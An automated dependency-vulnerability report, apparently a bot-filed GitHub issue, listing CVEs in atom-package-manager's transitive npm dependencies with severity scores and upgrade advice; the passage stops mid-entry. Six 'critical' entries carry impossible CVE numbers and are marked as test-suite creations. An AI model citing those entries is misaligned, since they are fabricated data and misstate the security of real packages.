atom-package-manager-2.6.5.tgz: 21 vulnerabilities (highest severity is: 9.8) #3

@dev-mend-for-github-com

Description

Vulnerable Library - atom-package-manager-2.6.5.tgz

Path to dependency file: /apm/package.json

Path to vulnerable library: /package.json,/apm/package.json

Vulnerabilities

Vulnerability Severity CVSS Dependency Type Fixed in (atom-package-manager version) Remediation Possible** Reachability
CVE-88990-306783 Critical 9.8 request-2.88.0.tgz Transitive N/A*
CVE-814504-1548 Critical 9.8 isstream-0.1.2.tgz Transitive N/A*
CVE-72435-185255 Critical 9.8 tweetnacl-0.14.5.tgz Transitive N/A*
CVE-495493-603164 Critical 9.8 delegates-1.0.0.tgz Transitive N/A*
CVE-295712-399081 Critical 9.8 asn1-0.2.6.tgz Transitive N/A*
CVE-289561-266276 Critical 9.8 inherits-2.0.4.tgz Transitive N/A*
CVE-2022-37616 Critical 9.8 xmldom-0.1.31.tgz Transitive N/A*
CVE-2025-7783 High 8.7 detected in multiple dependencies Transitive N/A*
WS-2018-0625 High 7.5 xmlbuilder-0.4.3.tgz Transitive N/A*
CVE-2025-59343 High 7.5 tar-fs-2.1.1.tgz Transitive N/A*
CVE-2022-38900 High 7.5 decode-uri-component-0.2.0.tgz Transitive N/A*
CVE-2022-29244 High 7.5 npm-6.14.17.tgz Transitive N/A*
CVE-2021-3807 High 7.5 detected in multiple dependencies Transitive N/A*
CVE-2021-32796 Medium 6.5 xmldom-0.1.31.tgz Transitive N/A*
CVE-2023-28155 Medium 6.1 detected in multiple dependencies Transitive N/A*
GHSA-g2q5-5433-rhrf Medium 5.5 rc-1.2.8.tgz Transitive N/A*
CVE-2022-33987 Medium 5.3 got-6.7.1.tgz Transitive N/A*
CVE-2022-25881 Medium 5.3 http-cache-semantics-3.8.1.tgz Transitive N/A*
CVE-2021-21366 Medium 4.3 xmldom-0.1.31.tgz Transitive N/A*
CVE-2025-5889 Low 3.1 brace-expansion-1.1.11.tgz Transitive N/A*
CVE-2025-54798 Low 2.5 tmp-0.0.28.tgz Transitive N/A*

*For some transitive vulnerabilities, there is no version of the direct dependency that carries a fix. Check the "Details" section below to see whether there is a version of the transitive dependency in which the vulnerability is fixed.

**In some cases, a remediation PR cannot be created automatically for a vulnerability even though a remediation is available.

Details

CVE-88990-306783

Vulnerable Library - request-2.88.0.tgz

Simplified HTTP request client.

Library home page: https://registry.npmjs.org/request/-/request-2.88.0.tgz

Path to dependency file: /apm/package.json

Path to vulnerable library: /apm/package.json,/package.json

Dependency Hierarchy:

  • atom-package-manager-2.6.5.tgz (Root Library)
    • npm-6.14.17.tgz
      • request-2.88.0.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

Created automatically by the test suite

Publish Date: 2010-06-07

URL: CVE-88990-306783

CVSS 3 Score Details (9.8)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: High

For more information on CVSS3 Scores, click here.

CVE-814504-1548

Vulnerable Library - isstream-0.1.2.tgz

Determine if an object is a Stream

Library home page: https://registry.npmjs.org/isstream/-/isstream-0.1.2.tgz

Path to dependency file: /script/vsts/package.json

Path to vulnerable library: /script/vsts/package.json,/package.json,/script/package.json,/apm/package.json

Dependency Hierarchy:

  • atom-package-manager-2.6.5.tgz (Root Library)
    • request-2.88.2.tgz
      • isstream-0.1.2.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

Created automatically by the test suite

Publish Date: 2010-06-07

URL: CVE-814504-1548

CVSS 3 Score Details (9.8)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: High

For more information on CVSS3 Scores, click here.

CVE-72435-185255

Vulnerable Library - tweetnacl-0.14.5.tgz

Port of TweetNaCl cryptographic library to JavaScript

Library home page: https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz

Path to dependency file: /package.json

Path to vulnerable library: /package.json,/script/vsts/package.json,/script/package.json,/apm/package.json

Dependency Hierarchy:

  • atom-package-manager-2.6.5.tgz (Root Library)
    • request-2.88.2.tgz
      • http-signature-1.2.0.tgz
        • sshpk-1.17.0.tgz
          • tweetnacl-0.14.5.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

Created automatically by the test suite

Publish Date: 2010-06-07

URL: CVE-72435-185255

CVSS 3 Score Details (9.8)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: High

For more information on CVSS3 Scores, click here.

CVE-495493-603164

Vulnerable Library - delegates-1.0.0.tgz

delegate methods and accessors to another property

Library home page: https://registry.npmjs.org/delegates/-/delegates-1.0.0.tgz

Path to dependency file: /apm/package.json

Path to vulnerable library: /apm/package.json,/script/package.json,/package.json

Dependency Hierarchy:

  • atom-package-manager-2.6.5.tgz (Root Library)
    • npm-6.14.17.tgz
      • npmlog-4.1.2.tgz
        • are-we-there-yet-1.1.4.tgz
          • delegates-1.0.0.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

Created automatically by the test suite

Publish Date: 2010-06-07

URL: CVE-495493-603164

CVSS 3 Score Details (9.8)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: High

For more information on CVSS3 Scores, click here.

CVE-295712-399081

Vulnerable Library - asn1-0.2.6.tgz

Contains parsers and serializers for ASN.1 (currently BER only)

Library home page: https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz

Path to dependency file: /apm/package.json

Path to vulnerable library: /apm/package.json

Dependency Hierarchy:

  • atom-package-manager-2.6.5.tgz (Root Library)
    • request-2.88.2.tgz
      • http-signature-1.2.0.tgz
        • sshpk-1.17.0.tgz
          • asn1-0.2.6.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

Created automatically by the test suite

Publish Date: 2010-06-07

URL: CVE-295712-399081

CVSS 3 Score Details (9.8)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: High

For more information on CVSS3 Scores, click here.

CVE-289561-266276

Vulnerable Library - inherits-2.0.4.tgz

Browser-friendly inheritance fully compatible with standard node.js inherits()

Library home page: https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz

Path to dependency file: /packages/dev-live-reload/package.json

Path to vulnerable library: /packages/dev-live-reload/node_modules/inherits/package.json,/package.json,/packages/exception-reporting/node_modules/inherits/package.json,/apm/package.json,/packages/deprecation-cop/node_modules/inherits/package.json,/packages/git-diff/node_modules/inherits/package.json,/script/update-server/package.json,/script/package.json

Dependency Hierarchy:

  • atom-package-manager-2.6.5.tgz (Root Library)
    • asar-require-0.3.0.tgz
      • asar-0.12.1.tgz
        • glob-6.0.4.tgz
          • inherits-2.0.4.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

Created automatically by the test suite

Publish Date: 2010-06-07

URL: CVE-289561-266276

CVSS 3 Score Details (9.8)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: High

For more information on CVSS3 Scores, click here.

CVE-2022-37616

Vulnerable Library - xmldom-0.1.31.tgz

A W3C Standard XML DOM(Level2 CORE) implementation and parser(DOMParser/XMLSerializer).

Library home page: https://registry.npmjs.org/xmldom/-/xmldom-0.1.31.tgz

Path to dependency file: /apm/package.json

Path to vulnerable library: /apm/package.json

Dependency Hierarchy:

  • atom-package-manager-2.6.5.tgz (Root Library)
    • plist-0.4.4.tgz
      • xmldom-0.1.31.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

A prototype pollution vulnerability exists in the function copy in dom.js in the xmldom (published as @xmldom/xmldom) package before 0.8.3 for Node.js via the p variable. NOTE: the vendor states "we are in the process of marking this report as invalid"; however, some third parties take the position that "A prototype injection/Prototype pollution is not just when global objects are polluted with recursive merge or deep cloning but also when a target object is polluted."

Publish Date: 2022-10-11

URL: CVE-2022-37616

CVSS 3 Score Details (9.8)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: High

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-9pgh-qqpf-7wqj

Release Date: 2022-10-11

Fix Resolution: @xmldom/xmldom - 0.7.6,@xmldom/xmldom - 0.9.0-beta.2,@xmldom/xmldom - 0.8.3

CVE-2025-7783

Vulnerable Libraries - form-data-2.3.2.tgz, form-data-2.3.3.tgz

form-data-2.3.2.tgz

A library to create readable "multipart/form-data" streams. Can be used to submit forms and file uploads to other web applications.

Library home page: https://registry.npmjs.org/form-data/-/form-data-2.3.2.tgz

Path to dependency file: /script/vsts/package.json

Path to vulnerable library: /script/vsts/package.json,/apm/package.json

Dependency Hierarchy:

  • atom-package-manager-2.6.5.tgz (Root Library)
    • npm-6.14.17.tgz
      • request-2.88.0.tgz
        • form-data-2.3.2.tgz (Vulnerable Library)

form-data-2.3.3.tgz

A library to create readable "multipart/form-data" streams. Can be used to submit forms and file uploads to other web applications.

Library home page: https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz

Path to dependency file: /apm/package.json

Path to vulnerable library: /apm/package.json,/package.json,/script/package.json

Dependency Hierarchy:

  • atom-package-manager-2.6.5.tgz (Root Library)
    • request-2.88.2.tgz
      • form-data-2.3.3.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

Summary

form-data uses Math.random() to select a boundary value for multipart form-encoded data. This can lead to a security issue if an attacker:

1. can observe other values produced by Math.random in the target application, and
2. can control one field of a request made using form-data.

Because the values of Math.random() are pseudo-random and predictable (see: https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f), an attacker who can observe a few sequential values can determine the state of the PRNG and predict future values, including those used to generate form-data's boundary value. This allows the attacker to craft a value that contains a boundary value, allowing them to inject additional parameters into the request.

This is largely the same vulnerability as was recently found in undici (https://hackerone.com/reports/2913312) by parrot409 (https://hackerone.com/parrot409?type=user) -- I'm not affiliated with that researcher but want to give credit where credit is due! My PoC is largely based on their work.

Details

The culprit is this line here: https://github.com/form-data/form-data/blob/426ba9ac440f95d1998dac9a5cd8d738043b048f/lib/form_data.js#L347

An attacker who is able to predict the output of Math.random() can predict this boundary value, and craft a payload that contains the boundary value, followed by another, fully attacker-controlled field. This is roughly equivalent to any sort of improper escaping vulnerability, with the caveat that the attacker must find a way to observe other Math.random() values generated by the application to solve for the state of the PRNG.

However, Math.random() is used in all sorts of places that might be visible to an attacker (including by form-data itself, if the attacker can arrange for the vulnerable application to make a request to an attacker-controlled server using form-data, such as a user-controlled webhook -- the attacker could observe the boundary values from those requests to observe the Math.random() outputs). A common example would be an "x-request-id" header added by the server. These sorts of headers are often used for distributed tracing, to correlate errors across the frontend and backend. Math.random() is a fine place to get these sorts of IDs (in fact, opentelemetry uses Math.random for this purpose (https://github.com/open-telemetry/opentelemetry-js/blob/2053f0d3a44631ade77ea04f656056a2c8a2ae76/packages/opentelemetry-sdk-trace-base/src/platform/node/RandomIdGenerator.ts#L22)).

PoC

PoC here: https://github.com/benweissmann/CVE-2025-7783-poc

Instructions are in that repo. It's based on the PoC from https://hackerone.com/reports/2913312 but simplified somewhat; the vulnerable application has a more direct side-channel from which to observe Math.random() values (a separate endpoint that happens to include a randomly-generated request ID).

Impact

For an application to be vulnerable, it must:

  • Use form-data to send data including user-controlled data to some other system. The attacker must be able to do something malicious by adding extra parameters (that were not intended to be user-controlled) to this request. Depending on the target system's handling of repeated parameters, the attacker might be able to overwrite values in addition to appending values (some multipart form handlers deal with repeats by overwriting values instead of representing them as an array).
  • Reveal values of Math.random(). It's easiest if the attacker can observe multiple sequential values, but more complex math could recover the PRNG state to some degree of confidence with non-sequential values.

If an application is vulnerable, this allows an attacker to make arbitrary requests to internal systems.

Publish Date: 2025-07-21

URL: CVE-2025-7783

CVSS 3 Score Details (8.7)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: High
    • Privileges Required: None
    • User Interaction: None
    • Scope: Changed
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: None

For more information on CVSS3 Scores, click here.

WS-2018-0625

Vulnerable Library - xmlbuilder-0.4.3.tgz

An XML builder for node.js

Library home page: https://registry.npmjs.org/xmlbuilder/-/xmlbuilder-0.4.3.tgz

Path to dependency file: /apm/package.json

Path to vulnerable library: /apm/package.json

Dependency Hierarchy:

  • atom-package-manager-2.6.5.tgz (Root Library)
    • plist-0.4.4.tgz
      • xmlbuilder-0.4.3.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

The package xmlbuilder-js before 9.0.5 is vulnerable to denial of service due to a regular expression issue.

Publish Date: 2018-02-08

URL: WS-2018-0625

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Release Date: 2018-02-08

Fix Resolution: 9.0.5

CVE-2025-59343

Vulnerable Library - tar-fs-2.1.1.tgz

filesystem bindings for tar-stream

Library home page: https://registry.npmjs.org/tar-fs/-/tar-fs-2.1.1.tgz

Path to dependency file: /package.json

Path to vulnerable library: /package.json,/apm/package.json

Dependency Hierarchy:

  • atom-package-manager-2.6.5.tgz (Root Library)
    • keytar-7.9.0.tgz
      • prebuild-install-7.1.1.tgz
        • tar-fs-2.1.1.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

Impact

v3.1.0, v2.1.3, v1.16.5 and below

Patches

Has been patched in 3.1.1, 2.1.4, and 1.16.6

Workarounds

You can use the ignore option to ignore non files/directories.

    ignore (_, header) {
      // pass files & directories, ignore e.g. symlinks
      return header.type !== 'file' && header.type !== 'directory'
    }

Credit

Reported by: Mapta / BugBunny_ai

Publish Date: 2025-09-24

URL: CVE-2025-59343

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: High
    • Availability Impact: None

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-vj76-c3g6-qr5v

Release Date: 2025-09-24

Fix Resolution: tar-fs - 3.1.1,tar-fs - 1.16.5,tar-fs - 2.1.3

CVE-2022-38900

Vulnerable Library - decode-uri-component-0.2.0.tgz

A better decodeURIComponent

Library home page: https://registry.npmjs.org/decode-uri-component/-/decode-uri-component-0.2.0.tgz

Path to dependency file: /script/package.json

Path to vulnerable library: /script/package.json,/apm/package.json,/script/vsts/package.json

Dependency Hierarchy:

  • atom-package-manager-2.6.5.tgz (Root Library)
    • npm-6.14.17.tgz
      • query-string-6.8.2.tgz
        • decode-uri-component-0.2.0.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

decode-uri-component 0.2.0 is vulnerable to Improper Input Validation resulting in DoS.

Publish Date: 2022-11-28

URL: CVE-2022-38900

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-w573-4hg7-7wgq

Release Date: 2022-11-28

Fix Resolution: decode-uri-component - 0.2.1

CVE-2022-29244

Vulnerable Library - npm-6.14.17.tgz

a package manager for JavaScript

Library home page: https://registry.npmjs.org/npm/-/npm-6.14.17.tgz

Path to dependency file: /apm/package.json

Path to vulnerable library: /apm/package.json

Dependency Hierarchy:

  • atom-package-manager-2.6.5.tgz (Root Library)
    • npm-6.14.17.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

npm pack ignores root-level .gitignore and .npmignore file exclusion directives when run in a workspace or with a workspace flag (i.e. "--workspaces", "--workspace="). Anyone who has run "npm pack" or "npm publish" inside a workspace, as of v7.9.0 and v7.13.0 respectively, may be affected and have published files into the npm registry they did not intend to include. Users should upgrade to the latest, patched version of npm, v8.11.0; run: npm i -g npm@latest. Node.js versions v16.15.1, v17.19.1, and v18.3.0 include the patched v8.11.0 version of npm.
Mend Note: The description of this vulnerability differs from MITRE.

Publish Date: 2022-06-13

URL: CVE-2022-29244

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: None
    • Availability Impact: None

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-hj9c-8jmm-8c52

Release Date: 2022-06-13

Fix Resolution: npm - 8.11.0

CVE-2021-3807

Vulnerable Libraries - ansi-regex-4.1.0.tgz, ansi-regex-3.0.0.tgz

ansi-regex-4.1.0.tgz

Regular expression for matching ANSI escape codes

Library home page: https://registry.npmjs.org/ansi-regex/-/ansi-regex-4.1.0.tgz

Path to dependency file: /script/package.json

Path to vulnerable library: /script/package.json,/apm/package.json

Dependency Hierarchy:

  • atom-package-manager-2.6.5.tgz (Root Library)
    • npm-6.14.17.tgz
      • libnpx-10.2.4.tgz
        • yargs-14.2.3.tgz
          • string-width-3.1.0.tgz
            • strip-ansi-5.2.0.tgz
              • ansi-regex-4.1.0.tgz (Vulnerable Library)

ansi-regex-3.0.0.tgz

Regular expression for matching ANSI escape codes

Library home page: https://registry.npmjs.org/ansi-regex/-/ansi-regex-3.0.0.tgz

Path to dependency file: /package.json

Path to vulnerable library: /package.json,/apm/package.json,/script/package.json

Dependency Hierarchy:

  • atom-package-manager-2.6.5.tgz (Root Library)
    • npm-6.14.17.tgz
      • cli-columns-3.1.2.tgz
        • string-width-2.1.1.tgz
          • strip-ansi-4.0.0.tgz
            • ansi-regex-3.0.0.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

ansi-regex is vulnerable to Inefficient Regular Expression Complexity

Publish Date: 2021-09-17

URL: CVE-2021-3807

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-93q8-gq69-wqmw

Release Date: 2021-09-17

Fix Resolution: ansi-regex - 5.0.1,ansi-regex - 4.1.1,ansi-regex - 6.0.1,ansi-regex - 3.0.1

CVE-2021-32796

Vulnerable Library - xmldom-0.1.31.tgz

A W3C Standard XML DOM(Level2 CORE) implementation and parser(DOMParser/XMLSerializer).

Library home page: https://registry.npmjs.org/xmldom/-/xmldom-0.1.31.tgz

Path to dependency file: /apm/package.json

Path to vulnerable library: /apm/package.json

Dependency Hierarchy:

  • atom-package-manager-2.6.5.tgz (Root Library)
    • plist-0.4.4.tgz
      • xmldom-0.1.31.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

xmldom is an open source pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. xmldom versions 0.6.0 and older do not correctly escape special characters when serializing elements removed from their ancestor. This may lead to unexpected syntactic changes during XML processing in some downstream applications. This issue has been resolved in version 0.7.0. As a workaround downstream applications can validate the input and reject the maliciously crafted documents.

Publish Date: 2021-07-27

URL: CVE-2021-32796

CVSS 3 Score Details (6.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: Low
    • Integrity Impact: Low
    • Availability Impact: None

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-5fg8-2547-mr8q

Release Date: 2021-07-27

Fix Resolution: @xmldom/xmldom - 0.7.0

CVE-2023-28155

Vulnerable Libraries - request-2.88.0.tgz, request-2.88.2.tgz

request-2.88.0.tgz

Simplified HTTP request client.

Library home page: https://registry.npmjs.org/request/-/request-2.88.0.tgz

Path to dependency file: /apm/package.json

Path to vulnerable library: /apm/package.json,/package.json

Dependency Hierarchy:

  • atom-package-manager-2.6.5.tgz (Root Library)
    • npm-6.14.17.tgz
      • request-2.88.0.tgz (Vulnerable Library)

request-2.88.2.tgz

Simplified HTTP request client.

Library home page: https://registry.npmjs.org/request/-/request-2.88.2.tgz

Path to dependency file: /apm/package.json

Path to vulnerable library: /apm/package.json

Dependency Hierarchy:

  • atom-package-manager-2.6.5.tgz (Root Library)
    • request-2.88.2.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

The Request package through 2.88.1 for Node.js allows a bypass of SSRF mitigations via an attacker-controlled server that does a cross-protocol redirect (HTTP to HTTPS, or HTTPS to HTTP). NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

Publish Date: 2023-03-16

URL: CVE-2023-28155

CVSS 3 Score Details (6.1)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: Required
    • Scope: Changed
  • Impact Metrics:
    • Confidentiality Impact: Low
    • Integrity Impact: Low
    • Availability Impact: None

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-p8p7-x288-28g6

Release Date: 2023-03-16

Fix Resolution: @cypress/request - 3.0.0

GHSA-g2q5-5433-rhrf

Vulnerable Library - rc-1.2.8.tgz

hardwired configuration loader

Library home page: https://registry.npmjs.org/rc/-/rc-1.2.8.tgz

Path to dependency file: /script/package.json

Path to vulnerable library: /script/package.json,/package.json,/apm/package.json

Dependency Hierarchy:

  • atom-package-manager-2.6.5.tgz (Root Library)
    • npm-6.14.17.tgz
      • update-notifier-2.5.0.tgz
        • latest-version-3.1.0.tgz
          • package-json-4.0.1.tgz
            • registry-auth-token-3.4.0.tgz
              • rc-1.2.8.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

The npm package "rc" had versions published with malicious code. Users of affected versions (1.2.9, 1.3.9, and 2.3.9) should downgrade to 1.2.8 as soon as possible and check their systems for suspicious activity. Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.

Publish Date: 2025-07-14

URL: GHSA-g2q5-5433-rhrf

CVSS 3 Score Details (5.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Local
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: Required
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High

For more information on CVSS3 Scores, click here.

CVE-2022-33987

Vulnerable Library - got-6.7.1.tgz

Simplified HTTP requests

Library home page: https://registry.npmjs.org/got/-/got-6.7.1.tgz

Path to dependency file: /apm/package.json

Path to vulnerable library: /apm/package.json

Dependency Hierarchy:

  • atom-package-manager-2.6.5.tgz (Root Library)
    • npm-6.14.17.tgz
      • update-notifier-2.5.0.tgz
        • latest-version-3.1.0.tgz
          • package-json-4.0.1.tgz
            • got-6.7.1.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

The got package before 12.1.0 (also fixed in 11.8.5) for Node.js allows a redirect to a UNIX socket.

Publish Date: 2022-06-18

URL: CVE-2022-33987

CVSS 3 Score Details (5.3)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: Low
    • Availability Impact: None

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-pfrx-2q88-qq97

Release Date: 2022-06-18

Fix Resolution: got - 12.1.0,got - 11.8.5

CVE-2022-25881

Vulnerable Library - http-cache-semantics-3.8.1.tgz

Parses Cache-Control and other headers. Helps building correct HTTP caches and proxies

Library home page: https://registry.npmjs.org/http-cache-semantics/-/http-cache-semantics-3.8.1.tgz

Path to dependency file: /apm/package.json

Path to vulnerable library: /apm/package.json,/script/vsts/package.json

Dependency Hierarchy:

  • atom-package-manager-2.6.5.tgz (Root Library)
    • npm-6.14.17.tgz
      • npm-registry-fetch-4.0.7.tgz
        • make-fetch-happen-5.0.2.tgz
          • http-cache-semantics-3.8.1.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

This affects versions of the package http-cache-semantics before 4.1.1. The issue can be exploited via malicious request header values sent to a server, when that server reads the cache policy from the request using this library.

Publish Date: 2023-01-31

URL: CVE-2022-25881

CVSS 3 Score Details (5.3)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: Low

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-rc47-6667-2j5j

Release Date: 2023-01-31

Fix Resolution: org.webjars.npm:http-cache-semantics:4.1.1,http-cache-semantics - 4.1.1

CVE-2021-21366

Vulnerable Library - xmldom-0.1.31.tgz

A W3C Standard XML DOM(Level2 CORE) implementation and parser(DOMParser/XMLSerializer).

Library home page: https://registry.npmjs.org/xmldom/-/xmldom-0.1.31.tgz

Path to dependency file: /apm/package.json

Path to vulnerable library: /apm/package.json

Dependency Hierarchy:

  • atom-package-manager-2.6.5.tgz (Root Library)
    • plist-0.4.4.tgz
      • xmldom-0.1.31.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. xmldom versions 0.4.0 and older do not correctly preserve system identifiers, FPIs or namespaces when repeatedly parsing and serializing maliciously crafted documents. This may lead to unexpected syntactic changes during XML processing in some downstream applications. This is fixed in version 0.5.0. As a workaround downstream applications can validate the input and reject the maliciously crafted documents.

Publish Date: 2021-03-12

URL: CVE-2021-21366

CVSS 3 Score Details (4.3)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: Required
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: Low
    • Availability Impact: None

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-h6q6-9hqw-rwfv

Release Date: 2021-03-12

Fix Resolution: xmldom - 0.5.0

CVE-2025-5889

Vulnerable Library - brace-expansion-1.1.11.tgz

Brace expansion as known from sh/bash

Library home page: https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz

Path to dependency file: /script/package.json

Path to vulnerable library: /script/package.json,/script/vsts/package.json,/apm/package.json,/package.json

Dependency Hierarchy:

  • atom-package-manager-2.6.5.tgz (Root Library)
    • glob-7.2.3.tgz
      • minimatch-3.1.2.tgz
        • brace-expansion-1.1.11.tgz (Vulnerable Library)

Found in base branch: electron-upgrade

Vulnerability Details

A vulnerability was found in juliangruber brace-expansion up to 1.1.11/2.0.1/3.0.0/4.0.0. It has been rated as problematic. The issue affects the function expand in the file index.js. The manipulation leads to inefficient regular expression complexity. The attack may be launched remotely, but its complexity is rather high and exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. Upgrading to version 1.1.12, 2.0.2, 3.0.1 or 4.0.1 addresses this issue; the patch is commit "a5b98a4f30d7813266b221435e1eaaf25a1b0ac5". It is recommended to upgrade the affected component.

Publish Date: 2025-07-14

URL: CVE-2025-5889

CVSS 3 Score Details (3.1)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: High
    • Privileges Required: Low
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: Low

For more information on CVSS3 Scores, click here.

CVE-2025-54798

Vulnerable Library - tmp-0.0.28.tgz

Temporary file and directory creator

Library home page: https://registry.npmjs.org/tmp/-/tmp-0.0.28.tgz

Path to dependency file: /apm/package.json

